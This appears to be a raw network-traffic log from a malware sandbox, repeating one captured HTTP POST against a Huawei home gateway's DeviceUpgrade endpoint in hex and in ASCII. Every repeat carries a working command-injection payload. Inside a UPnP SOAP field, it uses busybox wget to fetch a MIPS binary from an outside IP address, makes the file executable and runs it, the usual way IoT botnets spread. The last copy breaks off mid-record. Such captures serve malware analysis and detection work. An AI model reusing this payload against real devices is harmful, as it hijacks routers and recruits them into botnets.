          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 